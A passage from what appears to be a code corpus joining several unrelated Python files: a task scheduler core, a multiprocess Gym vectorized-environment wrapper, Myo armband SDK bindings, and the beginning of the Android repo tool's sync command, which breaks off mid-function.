self._profiler.put(t.name, t.op + 'COMMUNICATION', 'B')
t.immediate_do(callback=_end_callback, callback_context=self)
return True
# The callback runs when a non-immediate task is ready.
def _start_callback(task, self):
with self._pending_lock:
self._pending.remove(task)
self._profiler.put(task.name, task.op + 'QUEUE', 'B')
with self._condition:
self._queue.put((task.priority, self._commands['DATA'], task))
self._condition.notify_all()
self._logger.debug(
"{} has been posted into Core with priority {}".format(task.desc, task.priority))
# Prepare the task, i.e., add dependency Proxies.
for t in subtasks:
with self._pending_lock:
self._pending.add(t)
t.prepare(callback=_start_callback, callback_context=self)
return True
def _loop(self):
"""The main scheduling logic is a while loop that pops a task from queue each time and do it if credit is enough.
The credit decreases when a task is running and increases when a task is finished.
"""
# The callback runs when a non-immediate task is finished.
def _end_callback(task, self):
with self._condition:
self._credit += task.tensor_size()
if self._credit > self._credit_limit:
self._credit = self._credit_limit
self._running.remove(task)
self._condition.notify_all()
self._finished[task.name] = task
self._profiler.put(task.name, task.op + 'COMMUNICATION', 'E')
while True:
with self._condition:
while True:
try:
priority, cmd, task = self._queue.get(False)
except:
# wait for (potential) new task
self._condition.wait()
continue
if task and self._credit <= 0:
self._queue.put((priority, cmd, task))
# wait for (potential) new credit
self._condition.wait()
else:
break
if cmd == self._commands['EXIT']:
break
else:
self._profiler.put(task.name, task.op + 'QUEUE', 'E')
with self._condition:
self._running.add(task)
self._credit -= task.tensor_size()
task.do(callback=_end_callback, callback_context=self)
self._profiler.put(task.name, task.op + 'COMMUNICATION', 'B')
def _tune(self):
if self._tuner.stopped and self._next_point is None:
self._tuner.exit()
return
# Only rank 0 runs auto-tuning algorithm
if self._rank == 0:
self._tuner.record(self._current_point, self._step)
if self._next_point is None:
self._next_point = self._tuner.next_point()
if self._next_point is not None and self._step == self._next_point["step"]:
with self._condition:
if "credit" in self._next_point:
self._credit_limit = self._next_point["credit"]
self._credit = self._next_point["credit"]
self._logger.info("core {}: autotuning sets credit to {}K at training step {}.".format(
self._rank, int(self._credit / 1000), self._step))
if "partition" in self._next_point:
self._partition_unit = self._next_point["partition"]
self._logger.info("core {}: autotuning sets partition to {}K at training step {}.".format(
self._rank, int(self._partition / 1000), self._step))
self._current_point = self._next_point
self._next_point = None
# Init a core once the module is imported
core = ByteCore()
|
subproc_vec_env.py | from copy import deepcopy
import multiprocessing
from collections import OrderedDict
import gym
import numpy as np
import time
from .base_vec_env import VecEnv, CloudpickleWrapper
from .tile_images import tile_images
from .util import flatten_obs
def _worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.var()
while True:
try:
cmd, data = remote.recv()
if cmd == 'step':
observation, reward, done, info = env.step(data)
remote.send((observation, reward, done, info))
elif cmd == 'reset':
observation = env.reset()
remote.send(observation)
elif cmd == 'render':
remote.send(env.render(*data[0], **data[1]))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
elif cmd == 'env_method':
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == 'get_attr':
remote.send(getattr(env, data))
elif cmd == 'set_attr':
remote.send(setattr(env, data[0], data[1]))
elif cmd == 'get_obs':
remote.send(env.get_obs())
elif cmd == 'set_env_state':
remote.send(env.set_env_state(data))
elif cmd == 'get_env_state':
state = env.get_env_state()
remote.send(state)
elif cmd == 'rollout':
# obs_vec, rew_vec, done_vec, info, next_obs_vec = env.rollout(data) #state_vec
# remote.send((obs_vec, rew_vec, done_vec, info, next_obs_vec)) #state_vec
obs_vec, rew_vec, act_vec, done_vec, info, next_obs_vec = env.rollout(*data) #state_vec
remote.send((obs_vec, rew_vec, act_vec, done_vec, info, next_obs_vec)) #state_vec
elif cmd == 'seed':
remote.send(env.seed(data))
elif cmd == 'get_seed':
remote.send((env.seed))
elif cmd == 'randomize_dynamics':
default_params, randomized_params = env.randomize_dynamics(data)
remote.send((default_params, randomized_params))
else:
raise NotImplementedError
except EOFError:
break
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow
sessions or other non thread-safe libraries are used in the parent (see issue #217).
However, compared to 'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods,
users must wrap the code in an ``if __name__ == "__main__":``
For more information, see the multiprocessing documentation.
:param env_fns: ([Gym Environment]) Environments to run in subprocesses
:param start_method: (str) method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'fork' on available platforms, and 'spawn' otherwise.
"""
def __init__(self, env_fns, start_method=None):
self.waiting = False
self.closed = False
n_envs = len(env_fns)
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
fork_available = 'fork' in multiprocessing.get_all_start_methods()
start_method = 'fork' if fork_available else 'spawn'
ctx = multiprocessing.get_context(start_method)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes, env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = ctx.Process(target=_worker, args=args, daemon=True)
process.start()
self.processes.append(process)
work_remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
if np.size(actions.shape) > 1:
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
else:
for remote in self.remotes:
remote.send(('step', actions))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return flatten_obs(obs, self.observation_space), np.stack(rews), np.stack(dones), infos
def rollout(self, num_particles, horizon, mean, noise, mode="open_loop"):
"""
Rollout the environments to a horizon given open loop action sequence
:param u_vec
"""
self.rollout_async(num_particles, horizon, mean, noise, mode)
return self.rollout_wait()
# def rollout_async(self, u_vec):
# assert u_vec.shape[0] % len(self.remotes) == 0, "Number of particles must be divisible by number of cpus"
# batch_size = int(u_vec.shape[0]/len(self.remotes))
# for i,remote in enumerate(self.remotes):
# u_vec_i = u_vec[i*batch_size: (i+1)*batch_size, :, :].copy()
# remote.send(('rollout', u_vec_i))
# self.waiting = True
# def rollout_wait(self):
# results = [remote.recv() for remote in self.remotes]
# self.waiting=False
# obs_vec = [res[0] for res in results]
# # state_vec = [res[1] for res in results]
# rew_vec = [res[1] for res in results]
# done_vec = [res[2] for res in results]
# info = [res[3] for res in results]
# next_obs_vec = [res[4] for res in results]
# stacked_obs = np.concatenate(obs_vec, axis=0)
# # stacked_state = np.concatenate(state_vec, axis=0)
# stacked_rews = np.concatenate(rew_vec, axis=0)
# stacked_done = np.concatenate(done_vec, axis=0)
# stacked_next_obs = np.concatenate(next_obs_vec, axis=0)
# return stacked_obs, stacked_rews, stacked_done, info, stacked_next_obs # stacked_state
def rollout_async(self, num_particles, horizon, mean, noise, mode="open_loop"):
assert num_particles % len(self.remotes) == 0, "Number of particles must be divisible by number of cpus"
batch_size = int(num_particles / len(self.remotes)) #int(noise.shape[0]/len(self.remotes))
for i,remote in enumerate(self.remotes):
#Note: this will change if noise is weight matrix
delta_i = noise[i*batch_size: (i+1)*batch_size, :, :].copy() if noise is not None else None
remote.send(('rollout', (batch_size, horizon, mean, delta_i, mode)))
self.waiting = True
def rollout_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting=False
obs_vec = [res[0] for res in results]
# state_vec = [res[1] for res in results]
rew_vec = [res[1] for res in results]
act_vec = [res[2] for res in results]
done_vec = [res[3] for res in results]
info = [res[4] for res in results]
next_obs_vec = [res[5] for res in results]
stacked_obs = np.concatenate(obs_vec, axis=0)
# stacked_state = np.concatenate(state_vec, axis=0)
stacked_rews = np.concatenate(rew_vec, axis=0)
stacked_acts = np.concatenate(act_vec, axis=0)
stacked_done = np.concatenate(done_vec, axis=0)
stacked_next_obs = np.concatenate(next_obs_vec, axis=0)
return stacked_obs, stacked_rews, stacked_acts, stacked_done, info, stacked_next_obs # stacked_state
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
obs = [remote.recv() for remote in self.remotes]
return flatten_obs(obs, self.observation_space)
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for process in self.processes:
process.join()
self.closed = True
def render(self, mode='human', *args, **kwargs):
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(('render', (args, {'mode': 'rgb_array', **kwargs})))
imgs = [pipe.recv() for pipe in self.remotes]
# Create a big image by tiling images from subprocesses
bigimg = tile_images(imgs)
if mode == 'human':
import cv2
cv2.imshow('vecenv', bigimg[:, :, ::-1])
cv2.waitKey(1)
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
def get_obs(self):
for remote in self.remotes:
remote.send(('get_obs', None))
observations = [remote.recv() for remote in self.remotes]
stacked_obs = np.vstack(observations)
return stacked_obs
# --------------------------------
# get and set states
# --------------------------------
def set_env_state(self, state_dicts):
"""
Set the state of all envs given a list of
state dicts
If only one state is provided, we set state of all envs to that
else each env must be provided one state
"""
if isinstance(state_dicts, list):
num_states = len(state_dicts)
assert num_states == 1 or num_states == len(self.remotes), \
"num states should equal 1 (same for all envs) or 1 per env"
if num_states == 1:
state_dicts = [deepcopy(state_dicts[0]) for j in range(len(self.remotes))]
else: state_dicts = [deepcopy(state_dicts) for j in range(len(self.remotes))]
for i,remote in enumerate(self.remotes):
remote.send(('set_env_state', state_dicts[i]))
for remote in self.remotes: remote.recv()
def get_env_state(self):
for remote in self.remotes:
remote.send(('get_env_state', None))
states = [remote.recv() for remote in self.remotes]
return states
def get_images(self):
for pipe in self.remotes:
pipe.send(('render', {"mode": 'rgb_array'}))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self, attr_name, indices=None):
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(('get_attr', attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self, attr_name, value, indices=None):
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(('set_attr', (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self, method_name, *method_args, indices=None, **method_kwargs):
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(('env_method', (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices):
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: (None,int,Iterable) refers to indices of envs.
:return: ([multiprocessing.Connection]) Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
def seed(self, seed_list):
assert len(seed_list) == len(self.remotes), "Each environment must be provided a seed"
for i,remote in enumerate(self.remotes):
remote.send(('seed', seed_list[i]))
results = [remote.recv() for remote in self.remotes]
def randomize_dynamics(self, param_dict, base_seed):
seed_list = [base_seed + i*12345 for i in range(len(self.remotes))]
self.seed(seed_list)
for i,remote in enumerate(self.remotes):
remote.send(('randomize_dynamics', param_dict))
results = [remote.recv() for remote in self.remotes]
default_params = [res[0] for res in results]
randomized_params = [res[1] for res in results]
return default_params, randomized_params |
__init__.py | # Copyright (c) 2015 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
:mod:`myo` - Python bindings for the Myo SDK
============================================
.. author:: Niklas Rosenstein <rosensteinniklas(at)gmail.com>
.. license:: MIT
"""
__author__ = 'Niklas Rosenstein <rosensteinniklas@gmail.com>'
__version__ = '0.2.0'
__license__ = 'MIT'
from .lowlevel import enums
from .lowlevel.enums import *
__all__ = [
'Hub', 'DeviceListener', 'Event', 'myo_init', 'myo_initialized',
# Backwards compatibility
'init_myo', 'event_type', 'pose', 'locking_policy'] + enums.__all__
# The version of the Myo SDK that the library was recently
# updated for.
myo_sdk_version = '0.8.1'
from . import lowlevel as _myo
from .lowlevel import error, ResultError, InvalidOperation
from .vector import Vector
from .quaternion import Quaternion
from .device_listener import DeviceListener
import time
import threading
import traceback
import sys
init = myo_init = _myo.lib.init
myo_initialized = _myo.lib.initialized
class Hub(object):
"""
High-level interface for the Myo Hub which manages data processing
and event triggering for a Myo device.
.. note::
There can only be one Hub instance. The constructor of the
:class:`Hub` class will return the existing instance if
it has not been shut down since then.
"""
def __init__(self):
super(Hub, self).__init__()
self._lock = threading.RLock()
self._hub = _myo.Hub()
self._running = False
self._stopped = False
self._exception = None
self._thread = None
def __str__(self):
parts = ['<Hub ']
if not self._hub:
parts.append('shut down')
else:
with self._lock:
if self._running:
parts.append('running')
if self._stopped:
parts.append('stop-requested')
return ' ,'.join(parts) + '>'
def __nonzero__(self):
return bool(self._hub)
__bool__ = __nonzero__ # Python 3
def _assert_running(self):
with self._lock:
if not self._running:
raise RuntimeError('Hub is not running')
@property
def running(self):
"""
:return: True if the Hub is running, False if not.
"""
with self._lock:
return self._running
@property
def stop_requested(self):
"""
:return: True if the Hub has been stopped with a call to
:meth:`stop`, False if not. The Hub could still be
running though.
"""
with self._lock:
return self._stopped
stopped = stop_requested # Backwards compatibility
@property
def exception(self):
"""
Set when an exception occured within the listener. The
Hub can not be re-run if this is set. Use
:meth:`clear_exception` to remove the exception from the Hub.
"""
with self._lock:
return self._exception
def clear_exception(self):
"""
If an exception is set, the Hub can not be re-run. This
method will clear the stored exception if there is any.
"""
with self._lock:
self._exception = None
def set_locking_policy(self, locking_policy):
"""
Sets the locking policy.
"""
with self._lock:
self._hub.set_locking_policy(locking_policy)
def _run(self, duration_ms, listener):
"""
Private version of the :meth:`run` method. Does not
re-set the :attr:`running` attribute. Used by :meth:`run`.
"""
if not isinstance(listener, DeviceListener):
raise TypeError('listener must be DeviceListener instance')
# If there is an exception set, an exception occured
# in the listener and we will not do anything further!
with self._lock:
if self._exception:
message = 'exception occured in listener, can not rerun'
raise RuntimeError(message, self._exception)
def callback(listener, event):
# Stop immediately if the Hub was stopped via the
# stop() method.
with self._lock:
if self._stopped:
return False
# Invoke the listener but catch the event.
try:
return _invoke_listener(listener, event)
except Exception as exc:
traceback.print_exc()
with self._lock:
self._exception = exc
return False
return self._hub.run(duration_ms, callback, listener)
def run(self, interval_ms, listener, lil_sleep=0.01):
"""
Run the Hub with an execution interval of *interval_ms*
and the specified *listener* until the Hub was stopped. This
method does not block the main thread. Returns the thread
object that was created.
The Hub and its thread will stop as soon as :meth:`stop`
was called or the :class:`DeviceListener` returns False
from one of its callback methods.
*lil_sleep* specifies a number of seconds to sleep after
the Hub has been started. This will allow the Hub thread
to start before anything else is called.
"""
if not isinstance(listener, DeviceListener):
raise TypeError('listener must be DeviceListener instance')
# Make sure the Hub doesn't run already and set
# the running flag to True.
with self._lock:
if self._running:
raise RuntimeError('Hub is already running')
self._running = True
# This is the worker function that is running in
# a new thread.
def worker():
while not self.stop_requested:
if not self._run(interval_ms, listener):
self.stop()
with self._lock:
self._running = False
with self._lock:
self._thread = threading.Thread(target=worker)
self._thread.start()
# Little sleeping so we can immediately call pair_any()
# or variants.
if lil_sleep:
time.sleep(lil_sleep)
def stop(self, join=False):
"""
Request the Stop of the Hub when it is running. When
*join* is True, this function will block the current thread
until the Hub is not :attr:`running` anymore.
"""
with self._lock:
self._stopped = True
if join: self.join()
def join(self, timeout=None):
"""
If the Hub was run with a thread, it can be joined (waiting
blocked) with this method. If the Hub was not started within a
thread, this method will do nothing.
"""
with self._lock:
if not self._thread:
return
if not self._thread.is_alive():
self._thread = None
return
thread = self._thread
thread.join(timeout)
with self._lock:
if not thread.is_alive():
self._thread = None
def shutdown(self):
"""
Shut the hub down. If the hub is still running, it will be
stopped right where it is. Call it before the hub is being
garbage collected, or a warning will be printed that it has not
been called.
Do not call this method from a DeviceListener as it would
cause the current thread to be joined which is not possible.
Use :meth:`stop` to request a stop.
"""
self.stop()
try:
self.join()
except RuntimeError:
message = 'Hub.shutdown() must not be called from DeviceListener'
raise RuntimeError(message)
self._hub.shutdown()
def _invoke_listener(listener, event):
"""
Invokes the :class:`DeviceListener` callback methods for
the specified :class:`event<myo.lowlevel.event_t>`. If any
of the callbacks return False, this function will return False
as well. It also issues a warning when a DeviceListener method
did not return None or a boolean value.
:meth:`DeviceListener.on_event_finished` is always called,
event when any of the calls in between returned False already.
"""
myo = event.myo
timestamp = event.timestamp
# Invokes a method on the listener. If defaults=True, will prepend
# the myo and timestamp argument to *args.
def _(name, *args, **kwargs):
defaults = kwargs.pop('defaults', True)
if kwargs:
raise TypeError('unexpected arguments')
if defaults:
args = (myo, timestamp) + tuple(args)
method = getattr(listener, name)
result = method(*args)
if result is None:
return True
elif not isinstance(result, bool):
sys.stderr.write('DeviceListener.%s() must return None or bool\n' % name)
result = False
return result
kind = event.type
result = _('on_event', kind, event, defaults=False)
if kind == EventType.paired:
result = result and _('on_pair')
elif kind == EventType.unpaired:
result = result and _('on_unpair')
elif kind == EventType.connected:
result = result and _('on_connect')
elif kind == EventType.disconnected:
result = result and _('on_disconnect')
elif kind == EventType.pose:
result = result and _('on_pose', event.pose)
elif kind == EventType.orientation:
result = result and _('on_orientation_data', event.orientation)
result = result and _('on_accelerometor_data', event.acceleration)
result = result and _('on_gyroscope_data', event.gyroscope)
elif kind == EventType.rssi:
result = result and _('on_rssi', event.rssi)
elif kind == EventType.emg:
result = result and _('on_emg', event.emg)
elif kind == EventType.arm_unsynced:
result = result and _('on_unsync')
elif kind == EventType.arm_synced:
result = result and _('on_sync', event.arm, event.x_direction)
elif kind == EventType.unlocked:
result = result and _('on_unlock')
elif kind == EventType.locked:
result = result and _('on_lock')
else:
raise RuntimeError('invalid event type: %s' % kind)
if not _('on_event_finished', kind, event, defaults=False):
result = False
return result
# Backwards compatibility
event_type = EventType
pose = Pose
locking_policy = LockingPolicy
init_myo = myo_init
|
sync.py | # Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import http.cookiejar as cookielib
import io
import json
import multiprocessing
import netrc
from optparse import SUPPRESS_HELP
import os
import re
import socket
import subprocess
import sys
import tempfile
import time
import urllib.error
import urllib.parse
import urllib.request
import xmlrpc.client
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
import event_log
from git_command import GIT, git_require
from git_config import GetUrlCookieFile
from git_refs import R_HEADS, HEAD
import git_superproject
import gitc_utils
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand, WORKER_BATCH_SIZE
from error import RepoChangedException, GitError, ManifestParseError
import platform_utils
from project import SyncBuffer
from progress import Progress
from wrapper import Wrapper
from manifest_xml import GitcManifest
_ONE_DAY_S = 24 * 60 * 60
class _FetchError(Exception):
"""Internal error thrown in _FetchHelper() when we don't want stack trace."""
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
By default, all projects will be synced. The --fail-fast option can be used
to halt syncing as soon as possible when the first project fails to sync.
The --force-sync option can be used to overwrite existing git
directories if they have previously been linked to a different
object directory. WARNING: This may cause data to be lost since
refs may be removed when overwriting.
The --force-remove-dirty option can be used to remove previously used
projects with uncommitted changes. WARNING: This may cause data to be
lost since uncommitted changes may be removed with projects that no longer
exist in the manifest.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumeable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from server.
The -c/--current-branch option can be used to only fetch objects that
are on the branch specified by a project's revision.
The --optimized-fetch option can be used to only fetch projects that
are fixed to a sha1 revision if the sha1 revision does not already
exist locally.
The --prune option can be used to remove any refs that no longer
exist on the remote.
# SSH Connections
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
# Compatibility
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
PARALLEL_JOBS = 1
def _Options(self, p, show_smart=True):
try:
self.PARALLEL_JOBS = self.manifest.default.sync_j
except ManifestParseError:
pass
super()._Options(p)
p.add_option('-f', '--force-broken',
dest='force_broken', action='store_true',
help='obsolete option (to be deleted in the future)')
p.add_option('--fail-fast',
dest='fail_fast', action='store_true',
help='stop syncing after first error is hit')
p.add_option('--force-sync',
dest='force_sync', action='store_true',
help="overwrite an existing git directory if it needs to "
"point to a different object directory. WARNING: this "
"may cause loss of data")
p.add_option('--force-remove-dirty',
dest='force_remove_dirty', action='store_true',
help="force remove projects with uncommitted modifications if "
"projects no longer exist in the manifest. "
"WARNING: this may cause loss of data")
p.add_option('-l', '--local-only',
dest='local_only', action='store_true',
help="only update working tree, don't fetch")
p.add_option('--no-manifest-update', '--nmu',
dest='mp_update', action='store_false', default='true',
help='use the existing manifest checkout as-is. '
'(do not update to the latest revision)')
p.add_option('-n', '--network-only',
dest='network_only', action='store_true',
help="fetch only, don't update working tree")
p.add_option('-d', '--detach',
dest='detach_head', action='store_true',
help='detach projects back to manifest revision')
p.add_option('-c', '--current-branch',
dest='current_branch_only', action='store_true',
help='fetch only current branch from server')
p.add_option('-v', '--verbose',
dest='output_mode', action='store_true',
help='show all sync output')
p.add_option('-q', '--quiet',
dest='output_mode', action='store_false',
help='only show errors')
p.add_option('-m', '--manifest-name',
dest='manifest_name',
help='temporary manifest to use for this sync', metavar='NAME.xml')
p.add_option('--clone-bundle', action='store_true',
help='enable use of /clone.bundle on HTTP/HTTPS')
p.add_option('--no-clone-bundle', dest='clone_bundle', action='store_false',
help='disable use of /clone.bundle on HTTP/HTTPS')
p.add_option('-u', '--manifest-server-username', action='store',
dest='manifest_server_username',
help='username to authenticate with the manifest server')
p.add_option('-p', '--manifest-server-password', action='store',
dest='manifest_server_password',
help='password to authenticate with the manifest server')
p.add_option('--fetch-submodules',
dest='fetch_submodules', action='store_true',
help='fetch submodules from server')
p.add_option('--use-superproject', action='store_true',
help='use the manifest superproject to sync projects')
p.add_option('--no-tags',
dest='tags', default=True, action='store_false',
help="don't fetch tags")
p.add_option('--optimized-fetch',
dest='optimized_fetch', action='store_true',
help='only fetch projects fixed to sha1 if revision does not exist locally')
p.add_option('--retry-fetches',
default=0, action='store', type='int',
help='number of times to retry fetches on transient errors')
p.add_option('--prune', dest='prune', action='store_true',
help='delete refs that no longer exist on the remote')
p.add_option('--cache-dir', dest='cache_dir', action='store',
help='Use git-cache to populate project cache into this '
'directory. Bootstrap the local repository from this '
'directory if the project cache exists. This applies '
'to the projects on chromium and chrome-internal.')
if show_smart:
p.add_option('-s', '--smart-sync',
dest='smart_sync', action='store_true',
help='smart sync using manifest from the latest known good build')
p.add_option('-t', '--smart-tag',
dest='smart_tag', action='store',
help='smart sync using manifest from a known tag')
g = p.add_option_group('repo Version options')
g.add_option('--no-repo-verify',
dest='repo_verify', default=True, action='store_false',
help='do not verify repo source code')
g.add_option('--repo-upgraded',
dest='repo_upgraded', action='store_true',
help=SUPPRESS_HELP)
def _GetBranch(self):
"""Returns the branch name for getting the approved manifest."""
p = self.manifest.manifestProject
b = p.GetBranch(p.CurrentBranch)
branch = b.merge
if branch.startswith(R_HEADS):
branch = branch[len(R_HEADS):]
return branch
def _UseSuperproject(self, opt):
"""Returns True if use-superproject option is enabled"""
return (opt.use_superproject or
self.manifest.manifestProject.config.GetBoolean(
'repo.superproject'))
def _GetCurrentBranchOnly(self, opt):
"""Returns True if current-branch or use-superproject options are enabled."""
return opt.current_branch_only or self._UseSuperproject(opt)
def _UpdateProjectsRevisionId(self, opt, args):
"""Update revisionId of every project with the SHA from superproject.
This function updates each project's revisionId with SHA from superproject.
It writes the updated manifest into a file and reloads the manifest from it.
Args:
opt: Program options returned from optparse. See _Options().
args: Arguments to pass to GetProjects. See the GetProjects
docstring for details.
Returns:
Returns path to the overriding manifest file.
"""
superproject = git_superproject.Superproject(self.manifest,
self.repodir,
quiet=opt.quiet)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
manifest_path = superproject.UpdateProjectsRevisionId(all_projects)
if not manifest_path:
print('error: Update of revsionId from superproject has failed',
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_path)
return manifest_path
def _FetchProjectList(self, opt, projects, sem, *args, **kwargs):
"""Main function of the fetch threads.
Delegates most of the work to _FetchHelper.
Args:
opt: Program options returned from optparse. See _Options().
projects: Projects to fetch.
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
*args, **kwargs: Remaining arguments to pass to _FetchHelper. See the
_FetchHelper docstring for details.
"""
try:
for project in projects:
success = self._FetchHelper(opt, project, *args, **kwargs)
if not success and opt.fail_fast:
break
finally:
sem.release()
def _FetchHelper(self, opt, project, lock, fetched, pm, err_event,
clone_filter):
"""Fetch git objects for a single project.
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to fetch.
lock: Lock for accessing objects that are shared amongst multiple
_FetchHelper() threads.
fetched: set object that we will add project.gitdir to when we're done
(with our lock held).
pm: Instance of a Project object. We will call pm.update() (with our
lock held).
err_event: We'll set this event in the case of an error (after printing
out info about the error).
clone_filter: Filter for use in a partial clone.
Returns:
Whether the fetch was successful.
"""
# We'll set to true once we've locked the lock.
did_lock = False
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we unlock the lock if we locked it.
start = time.time()
success = False
buf = io.StringIO()
with lock:
pm.start(project.name)
try:
try:
success = project.Sync_NetworkHalf(
quiet=opt.quiet,
verbose=opt.verbose,
output_redir=buf,
current_branch_only=self._GetCurrentBranchOnly(opt),
force_sync=opt.force_sync,
clone_bundle=opt.clone_bundle,
tags=opt.tags, archive=self.manifest.IsArchive,
optimized_fetch=opt.optimized_fetch,
retry_fetches=opt.retry_fetches,
prune=opt.prune,
cache_dir=opt.cache_dir,
clone_filter=clone_filter)
self._fetch_times.Set(project, time.time() - start)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
output = buf.getvalue()
if opt.verbose and output:
pm.update(inc=0, msg=output.rstrip())
if not success:
err_event.set()
print('error: Cannot fetch %s from %s'
% (project.name, project.remote.url),
file=sys.stderr)
if opt.fail_fast:
raise _FetchError()
fetched.add(project.gitdir)
except _FetchError:
pass
except Exception as e:
print('error: Cannot fetch %s (%s: %s)'
% (project.name, type(e).__name__, str(e)), file=sys.stderr)
err_event.set()
raise
finally:
if not did_lock:
lock.acquire()
pm.finish(project.name)
lock.release()
finish = time.time()
self.event_log.AddSync(project, event_log.TASK_SYNC_NETWORK,
